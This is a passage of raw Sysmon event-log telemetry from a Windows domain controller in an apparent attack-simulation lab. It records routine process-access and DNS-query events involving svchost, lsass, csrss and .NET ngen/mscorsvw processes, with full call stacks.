13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.034{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000005309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.070{59A5CD1D-8E46-6005-1600-00000000A301}1544settings-win.data.microsoft.com0type: 5 settingsfd-geo.trafficmanager.net;::ffff:51.124.78.146;C:\Windows\System32\svchost.exe 10341000x80000000000000005317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.721{59A5CD1D-90A0-6005-2C01-00000000A301}27922760C:\Windows\system32\conhost.exe{59A5CD1D-90A3-6005-3001-00000000A301}4144C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.721{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A3-6005-3001-00000000A301}4144C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.721{59A5CD1D-90A0-6005-2901-00000000A301}44401132C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{59A5CD1D-90A3-6005-3001-00000000A301}4144C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+37d14(wow64)|UNKNOWN(0000000000FC404B)|UNKNOWN(0000000000FC3CFC)|UNKNOWN(0000000000FC4ADD)|UNKNOWN(0000000000FC2444)|UNKNOWN(0000000000FC0B66)|UNKNOWN(0000000000FC054F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+ebf6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11e50(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+17a14(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11801a(wow64) 10341000x80000000000000005314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.674{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.674{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.627{59A5CD1D-90A0-6005-2C01-00000000A301}27922760C:\Windows\system32\conhost.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.627{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:03.627{59A5CD1D-90A0-6005-2901-00000000A301}44401132C:\Windows\Microsoft.NET\Framework\v4.0.30319\NGenTask.exe{59A5CD1D-90A3-6005-2F01-00000000A301}3448C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.DLL+37d14(wow64)|UNKNOWN(0000000000FC404B)|UNKNOWN(0000000000FC3CFC)|UNKNOWN(0000000000FC1D03)|UNKNOWN(0000000000FC0B66)|UNKNOWN(0000000000FC054F)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+ebf6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11e50(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+17a14(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+11801a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll+18f677(wow64) 22542200x80000000000000005318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:02.159{59A5CD1D-8E56-6005-2E00-00000000A301}2464146.78.124.51.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x80000000000000005328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.659{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A8-6005-3301-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.643{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A8-6005-3301-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.643{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90A8-6005-3301-00000000A301}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.362{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A8-6005-3201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.362{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A8-6005-3201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:08.362{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90A8-6005-3201-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0